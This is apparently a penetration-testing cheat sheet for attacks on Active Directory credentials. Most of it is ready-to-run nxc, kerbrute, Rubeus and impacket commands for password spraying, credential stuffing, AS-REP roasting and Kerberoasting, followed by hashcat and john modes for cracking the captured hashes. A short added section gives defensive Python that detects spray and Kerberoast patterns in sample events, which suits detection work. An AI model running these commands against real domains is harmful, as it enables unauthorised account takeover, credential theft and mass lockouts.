
Password Attacks

Obtain valid credentials through spraying, AS-REP roasting, Kerberoasting, hash capturing and cracking. Always check the password policy before spraying — domain accounts can be locked out.


4.3 Password Spraying

nxc / kerbrute / Rubeus
⚠ Always check the password policy before spraying. Domain accounts can lock out quickly. Prefer local accounts or spray with one password per lockout window.
NXC
Check password policy first
nxc smb $TARGET_IP -u username -p password --pass-pol
Try username as password
nxc smb $DOMAIN -u usernames.txt -p usernames.txt --no-bruteforce --continue-on-success
Spray with single password
nxc smb $TARGET_IP -u users.txt -p 'password' --continue-on-success
nxc smb $TARGET_IP -u users.txt -p passwords.txt --continue-on-success
nxc smb $TARGET_IP -u user1 user2 user3 -p password1
nxc smb $DC -u users.txt -p Winter2024!
nxc smb $TARGET_IP -u user1 -p password1 password2 password3
nxc smb $TARGET_IP -u user.txt -p user.txt --no-bruteforce --continue-on-success
nxc smb $TARGET_IP -u user.txt -p password.txt --no-bruteforce --continue-on-success
KERBRUTE
kerbrute passwordspray -d corp.local users.txt Winter2024!
RUBEUS (Windows)
Rubeus.exe spray /password:Winter2024! /users:users.txt /domain:domain.local /dc:DC01.domain.local /outfile:tickets.txt

4.4 Credential Stuffing

nxc
Test found credentials against all services
nxc smb $TARGET_IP -u creds.txt -p creds.txt --no-bruteforce --continue-on-success
nxc winrm $TARGET_IP -u $USERNAME -p $PASSWORD
nxc rdp $TARGET_IP -u $USERNAME -p $PASSWORD
nxc ssh $TARGET_IP -u $USERNAME -p $PASSWORD

5.1 AS-REP Roasting

impacket / nxc / Rubeus
IMPACKET — GetNPUsers (no credentials needed)
GetNPUsers.py $DOMAIN/ -dc-ip $TARGET_IP -usersfile usernames.txt -outputfile hashes.txt
GetNPUsers.py $DOMAIN/ -dc-ip 10.112.129.121 -usersfile usernames.txt | grep '^\$' > as-rep-results.txt
GetNPUsers.py $DOMAIN/ -dc-ip $TARGET_IP -no-pass -usersfile usernames.txt -outputfile hashes.txt
# If you already have creds but want more hashes:
GetNPUsers.py $DOMAIN/user:pass -dc-ip $TARGET_IP -usersfile usernames.txt -outputfile hashes.txt
# Request specific user:
GetNPUsers.py $DOMAIN/user:pass -dc-ip $TARGET_IP -request
NXC
nxc ldap $TARGET_IP -u $USERNAME -p $PASSWORD --asreproast output.txt
nxc ldap $TARGET_IP -u '' -p '' --asreproast output.txt   # anonymous if possible
RUBEUS (Windows)
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
Clock skew error fix
su
timedatectl set-ntp off
rdate -n $TARGET_IP
Crack AS-REP hash
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt
john --format=krb5asrep hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

5.2 Kerberoasting

impacket / nxc / Rubeus
What it is: request TGS tickets for accounts with an SPN → crack offline
NXC
nxc ldap $TARGET_IP -u username -p 'password' --kerberoasting output.txt
IMPACKET — GetUserSPNs
GetUserSPNs.py $DOMAIN/$USERNAME:$PASSWORD -dc-ip $TARGET_IP -request -outputfile tgs_hashes.txt
GetUserSPNs.py $DOMAIN/$USERNAME:$PASSWORD -dc-ip $TARGET_IP -request-user specific_svc_account
RUBEUS (Windows)
Rubeus.exe kerberoast /outfile:tgs_hashes.txt /format:hashcat
Rubeus.exe kerberoast /rc4opsec   # only RC4 tickets (faster to crack)
Crack TGS hash
hashcat -m 13100 tgs_hashes.txt /usr/share/wordlists/rockyou.txt   # RC4
hashcat -m 19600 tgs_hashes.txt /usr/share/wordlists/rockyou.txt   # AES128
hashcat -m 19700 tgs_hashes.txt /usr/share/wordlists/rockyou.txt   # AES256
john --format=krb5tgs tgs_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
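Added defender-side example, not part of the original cheat sheet: detection logic for the two patterns above, a password spray as in section 4.3 (one source, many accounts, few failures each, staying under the lockout threshold) and Kerberoasting as in section 5.2 (one account requesting RC4 0x17 service tickets for many SPNs, the same tickets /rc4opsec selects). It runs over constructed event records with assumed field names, not real Windows event logs.

```python
from collections import Counter, defaultdict

# Constructed sample events (not real logs) modelled on Windows Security events
# 4625 (failed logon) and 4769 (TGS request); field names assumed, ts in seconds.
EVENTS = [
    # one source tries one password against many accounts: spray pattern
    {"id": 4625, "user": "alice", "src": "10.0.0.5", "ts": 100},
    {"id": 4625, "user": "bob", "src": "10.0.0.5", "ts": 101},
    {"id": 4625, "user": "carol", "src": "10.0.0.5", "ts": 102},
    {"id": 4625, "user": "dave", "src": "10.0.0.5", "ts": 103},
    {"id": 4625, "user": "erin", "src": "10.0.0.5", "ts": 104},
    # a user mistyping their own password twice: not a spray
    {"id": 4625, "user": "frank", "src": "10.0.0.9", "ts": 100},
    {"id": 4625, "user": "frank", "src": "10.0.0.9", "ts": 130},
    # one account pulls RC4 (0x17) service tickets for several SPNs
    {"id": 4769, "user": "mallory", "svc": "svc_sql", "enc": 0x17, "ts": 200},
    {"id": 4769, "user": "mallory", "svc": "svc_web", "enc": 0x17, "ts": 201},
    {"id": 4769, "user": "mallory", "svc": "svc_bkp", "enc": 0x17, "ts": 202},
    # ordinary AES256 (0x12) ticket request: not flagged
    {"id": 4769, "user": "alice", "svc": "svc_sql", "enc": 0x12, "ts": 203},
]

def windows(evs, window):
    """Yield, for each event, the events within `window` seconds after it."""
    evs = sorted(evs, key=lambda e: e["ts"])
    for i, start in enumerate(evs):
        yield [e for e in evs[i:] if e["ts"] - start["ts"] <= window]

def detect_spray(events, window=300, min_users=5, max_per_user=2):
    """Source IPs whose failed logons inside one window hit at least `min_users`
    accounts with at most `max_per_user` failures each: many accounts, few
    tries per account, a spray staying under the lockout threshold."""
    by_src = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            by_src[e["src"]].append(e)
    return sorted(src for src, evs in by_src.items() if any(
        len(c) >= min_users and max(c.values()) <= max_per_user
        for c in (Counter(e["user"] for e in w) for w in windows(evs, window))))

def detect_kerberoast(events, window=600, min_spns=3, weak_enc=(0x17,)):
    """Accounts that requested weakly encrypted (RC4 by default) service
    tickets for at least `min_spns` distinct SPNs inside one window."""
    by_user = defaultdict(list)
    for e in events:
        if e["id"] == 4769 and e["enc"] in weak_enc:
            by_user[e["user"]].append(e)
    return sorted(u for u, evs in by_user.items() if any(
        len({e["svc"] for e in w}) >= min_spns for w in windows(evs, window)))
```

Tune the thresholds to the domain's own lockout policy (the same --pass-pol values above) so a legitimate burst of typos does not fire while a one-password-per-window spray still does.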

6.4 Hash Cracking Reference

hashcat / john
NTLM hash (secretsdump, SAM) — secretsdump prints user:RID:LM:NT:::, where the LM half is usually the empty aad3b435b51404eeaad3...; the NT half is what -m 1000 cracks
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
john --format=NT hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
LM hash (old — Windows XP/2003)
hashcat -m 3000 hash.txt /usr/share/wordlists/rockyou.txt
john --format=LM hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
NTLMv1 hash (Responder)
hashcat -m 5500 hash.txt /usr/share/wordlists/rockyou.txt
john --format=netntlm hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
NTLMv2 hash (Responder, MITM) — format: user::DOMAIN:challenge:hash
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
john --format=netntlmv2 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
AS-REP hash — format: $krb5asrep$23$user@domain:...
hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt
john --format=krb5asrep hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
TGS RC4 (Kerberoasting) — format: $krb5tgs$23$user$service@domain:...
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
john --format=krb5tgs hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
TGS AES128 / AES256 (Kerberoasting)
hashcat -m 19600 hash.txt /usr/share/wordlists/rockyou.txt   # AES128
hashcat -m 19700 hash.txt /usr/share/wordlists/rockyou.txt   # AES256
MSCash2 / DCC2 (cached domain hashes — slow)
hashcat -m 2100 hash.txt /usr/share/wordlists/rockyou.txt
john --format=mscash2 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Timeroast hash
hashcat -m 31300 hash.txt /usr/share/wordlists/rockyou.txt
Use rules for better results
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/dive.rule